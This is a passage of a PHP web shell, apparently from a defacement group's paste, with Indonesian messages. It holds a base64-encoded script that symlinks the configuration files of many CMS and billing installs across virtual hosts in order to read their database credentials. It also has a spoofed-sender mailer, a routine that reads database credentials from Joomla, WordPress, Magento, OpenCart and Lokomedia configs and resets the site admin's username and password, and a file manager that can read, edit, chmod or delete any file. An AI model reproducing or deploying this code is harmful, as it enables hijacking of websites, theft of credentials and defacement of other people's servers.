NCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY2xpZW50LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5nLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbWFuYWdlLnR4dCcpOyANCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW15c2hvcC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictemVuY2FydC50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywkc2l0ZXNzLictc2hvcC1aQ3Nob3AudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bS50eHQnKTsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW1zL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZi1mb3J1bXMudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYXJ0aWNsZS9jb25maWcucGhwJywkc2l0ZXNzLictTndhaHkudHh0Jyk7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy11cDIudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlL2RiLnBocCcsJHNpdGVzcy4nLTcudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29ubmVjdC5waHAnLCRzaXRlc3MuJy1QSFAtRnVzaW9uLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcucGhwJywkc2l0ZXNzLictNGltYWdlcy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlcy9kZWZhdWx0L3NldHRpbmdzLnBocCcsJHNpdGVzcy4nLURydXBhbC50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgDQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZ3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1iaWxsaW5ncy50eHQnKSA7IA0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3JlcXVpcmVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1BTTRTUy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3N1cHBvcnRzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnRzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JpbGxpbmcvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3QudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdHMvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdHMudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RpbmdzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RpbmdzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxsaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGJpbGxzLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RiaWxsLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcC9ldGMvbG9jYWwueG1sJywkc2l0ZXNzLictTWFnZW50by50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hZG1pbi9jb25maWcucGhwJywkc2l0ZXNzLictT3BlbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlnL3NldHRpbmdzLmluYy5waHAnLCRzaXRlc3MuJy1QcmVzdGFzaG9wLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy9rb25la3NpLnBocCcsJHNpdGVzcy4nLUxva29tZWRpYS50eHQnKTsNCnN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9sb2tvbWVkaWEvY29uZmlnL2tvbmVrc2kucGhwJywkc2l0ZXNzLictTG9rb21lZGlhLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NsY29uZmlnLnBocCcsJHNpdGVzcy4nLVNpdGVsb2NrLnR4dCcpOw0Kc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2FwcGxpY2F0aW9uL2NvbmZpZy9kYXRhYmFzZS5waHAnLCRzaXRlc3MuJy1FbGxpc2xhYi50eHQnKTsNCn0NCnByaW50ICI8YnI+PGJyPjxicj48Zm9udCBjb2xvcj1yZWQ+RG9uZSAhISA8aW1nIHNyYz0naHR0cDovL2kuaW1ndXIuY29tL0x0dWtFSk4ucG5nJyAgaGVpZ2h0PSc3MCcgd2lkdGg9JzYwJz48L2ZvbnQ+IjsNCg==';
- $file = fopen("vhost.cin" ,"w+");
- $write = fwrite ($file ,base64_decode($xaivhost));
- fclose($file);
- chmod("vhost.cin",0755);
- echo "<a href='noname_vhost'>Klik Ini</a>";
- }
- ?>
- </body>
- </html>
- <?php
- }
- elseif($_GET['kntd'] == 'mail') {
- if($_POST['send']) {
- $to = $_POST['to'];
- $from = $_POST['from'];
- $subject = $_POST['subject'];
- $content = sulap($_POST['content']);
- if(@mail($to,$subject,$content,"FROM:$from")) {
- $out = "Mail sent to $to";
- } else {
- $out = "Failed !!";
- }
- }
- echo "<h1>Mailer</h1>
- <form method='post'>
- <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
- Subject :
- <input type='text' name='subject' value='Your Website'><br>
- To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='malaikat Galau@jembud.com'><br><input type='submit' name='send' value='Send'><br><br>";
- echo $out;
- }elseif($_GET['kntd'] == 'edituser') {
- if($_POST['hajar']) {
- if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
- echo "username atau password harus lebih dari 6 karakter";
- } else {
- $user_baru = $_POST['user_baru'];
- $pass_baru = md5($_POST['pass_baru']);
- $conf = $_POST['config_dir'];
- $scan_conf = scandir($conf);
- foreach($scan_conf as $file_conf) {
- if(!is_file("$conf/$file_conf")) continue;
- $config = file_get_contents("$conf/$file_conf");
- if(preg_match("/JConfig|joomla/",$config)) {
- $dbhost = ambilkata($config,"host = '","'");
- $dbuser = ambilkata($config,"user = '","'");
- $dbpass = ambilkata($config,"password = '","'");
- $dbname = ambilkata($config,"db = '","'");
- $dbprefix = ambilkata($config,"dbprefix = '","'");
- $prefix = $dbprefix."users";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result['id'];
- $site = ambilkata($config,"sitename = '","'");
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Joomla<br>";
- if($site == '') {
- echo "Sitename => <font color=lime>error, gabisa ambil nama domain nya</font><br>";
- } else {
- echo "Sitename => $site<br>";
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=lime>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/WordPress/",$config)) {
- $dbhost = ambilkata($config,"DB_HOST', '","'");
- $dbuser = ambilkata($config,"DB_USER', '","'");
- $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"DB_NAME', '","'");
- $dbprefix = ambilkata($config,"table_prefix = '","'");
- $prefix = $dbprefix."users";
- $option = $dbprefix."options";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[ID];
- $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[option_value];
- if($target == '') {
- $url_target = "Login => <font color=lime>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Wordpress<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=lime>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/Magento|Mage_Core/",$config)) {
- $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
- $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
- $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
- $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
- $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
- $prefix = $dbprefix."admin_user";
- $option = $dbprefix."core_config_data";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
- $result2 = mysql_fetch_array($q2);
- $target = $result2[value];
- if($target == '') {
- $url_target = "Login => <font color=lime>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Magento<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=lime>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
- $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
- $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
- $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
- $dbname = ambilkata($config,"'DB_DATABASE', '","'");
- $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
- $prefix = $dbprefix."user";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
- $result = mysql_fetch_array($q);
- $id = $result[user_id];
- $target = ambilkata($config,"HTTP_SERVER', '","'");
- if($target == '') {
- $url_target = "Login => <font color=lime>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => OpenCart<br>";
- echo $url_target;
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=lime>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
- }
- mysql_close($conn);
- } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
- $dbhost = ambilkata($config,'server = "','"');
- $dbuser = ambilkata($config,'username = "','"');
- $dbpass = ambilkata($config,'password = "','"');
- $dbname = ambilkata($config,'database = "','"');
- $prefix = "users";
- $option = "identitas";
- $conn = mysql_connect($dbhost,$dbuser,$dbpass);
- $db = mysql_select_db($dbname);
- $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
- $result = mysql_fetch_array($q);
- $target = $result[alamat_website];
- if($target == '') {
- $target2 = $result[url];
- $url_target = "Login => <font color=lime>error, gabisa ambil nama domain nyaa</font><br>";
- if($target2 == '') {
- $url_target2 = "Login => <font color=lime>error, gabisa ambil nama domain nyaa</font><br>";
- } else {
- $cek_login3 = file_get_contents("$target2/adminweb/");
- $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
- $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
- $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=lime>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- } else {
- $cek_login = file_get_contents("$target/adminweb/");
- $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
- if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
- $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
- } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
- $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
- } else {
- $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=lime>gatau admin login nya dimana :p</font> ]<br>";
- }
- }
- $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
- echo "Config => ".$file_conf."<br>";
- echo "CMS => Lokomedia<br>";
- if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
- echo $url_target2;
- } else {
- echo $url_target;
- }
- if(!$update OR !$conn OR !$db) {
- echo "Status => <font color=lime>".mysql_error()."</font><br><br>";
- } else {
- echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
- }
- mysql_close($conn);
- }
- }
- }
- } else {
- echo "<center>
- <h1>Auto Edit User Config</h1>
- <form method='post'>
- DIR Config: <br>
- <input type='text' size='50' name='config_dir' value='$path'><br><br>
- Set User & Pass: <br>
- <input type='text' name='user_baru' value='malaikat Galau' placeholder='user_baru'><br>
- <input type='text' name='pass_baru' value='malaikat Galau' placeholder='pass_baru'><br>
- <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
- </form>";
- }
- }elseif(isset($_GET['filesrc'])){
- echo "<tr><td>Current File : ";
- echo $_GET['filesrc'];
- echo '</tr></td></table><br/>';
- echo('<textarea cols="80" rows="20" readonly>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
- }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
- echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
- if($_POST['opt'] == 'chmod'){
- if(isset($_POST['perm'])){
- if(chmod($_POST['path'],$_POST['perm'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="lime">Denied !</font><br />';
- }
- }
- echo '<form method="POST">
- Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="chmod">
- <input type="submit" value="Go" />
- </form>';
- }
- elseif($_POST['opt'] == 'rename'){
- if(isset($_POST['newname'])){
- if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="lime">Denied !</font><br />';
- }
- $_POST['name'] = $_POST['newname'];
- }
- echo '<form method="POST">
- New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="rename">
- <input type="submit" value="Go" />
- </form>';
- }elseif($_POST['opt'] == 'edit'){
- if(isset($_POST['src'])){
- $fp = fopen($_POST['path'],'w');
- if(fwrite($fp,$_POST['src'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="lime">Denied !</font><br/>';
- }
- fclose($fp);
- }
- echo '<form method="POST">
- <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
- <input type="hidden" name="path" value="'.$_POST['path'].'">
- <input type="hidden" name="opt" value="edit">
- <input type="submit" value="Save" />
- </form>';
- }
- echo '</center>';
- }else{
- echo '</table><br/><center>';
- if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
- if($_POST['type'] == 'dir'){
- if(rmdir($_POST['path'])){
- echo '<font color="green">Success !</font><br/>';
- }else{
- echo '<font color="lime">Denied ! </font><br/>';
- }
- }elseif($_POST['type'] == 'file'){
- if(unlink($_POST['path'])){
- echo '<font color="green">Success</font><br/>';
- }else{
- echo '<font color="lime">Denied</font><br/>';
- }
- }
- }
- echo '</center>';
- $scandir = scandir($path);
- echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
- <tr class="first">
- <td><center>Name</center></td>
- <td><center>Size</center></td>
- <td><center>Permission</center></td>
- <td><center>Action</center></td>
- </tr>';
- foreach($scandir as $dir){
- if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
- echo '<tr>
- <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
- <td><center>--</center></td>
- <td><center>';
- if(is_writable($path.'/'.$dir)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$dir)) echo '<font color="lime">';
- echo perms($path.'/'.$dir);
- if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- </select>
- <input type="hidden" name="type" value="dir">
- <input type="hidden" name="name" value="'.$dir.'">
- <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
- foreach($scandir as $file){
- if(!is_file($path.'/'.$file)) continue;
- $size = filesize($path.'/'.$file)/1024;
- $size = round($size,3);
- if($size >= 1024){
- $size = round($size/1024,2).' MB';
- }else{
- $size = $size.' KB';
- }
- echo '<tr>
- <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
- <td><center>'.$size.'</center></td>
- <td><center>';
- if(is_writable($path.'/'.$file)) echo '<font color="green">';
- elseif(!is_readable($path.'/'.$file)) echo '<font color="lime">';
- echo perms($path.'/'.$file);
- if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
- echo '</center></td>
- <td><center><form method="POST" action="?option&path='.$path.'">
- <select name="opt">
- <option value="">Select</option>
- <option value="delete">Delete</option>
- <option value="chmod">Chmod</option>
- <option value="rename">Rename</option>
- <option value="edit">Edit</option>
- </select>
- <input type="hidden" name="type" value="file">
- <input type="hidden" name="name" value="'.$file.'">
- <input type="hidden" name="path" value="'.$path.'/'.$file.'">
- <input type="submit" value=">">
- </form></center></td>
- </tr>';
- }
- echo '</table>
- </div>';
- }
- echo '<center><br/>Copyright © 2017 <a href="https://www.facebook.com/defacertersakititeam" target="_blank">malaikat Galau<</a></center>
- </body>
- </html>';
- ?>
Add Comment
Please, Sign In to add comment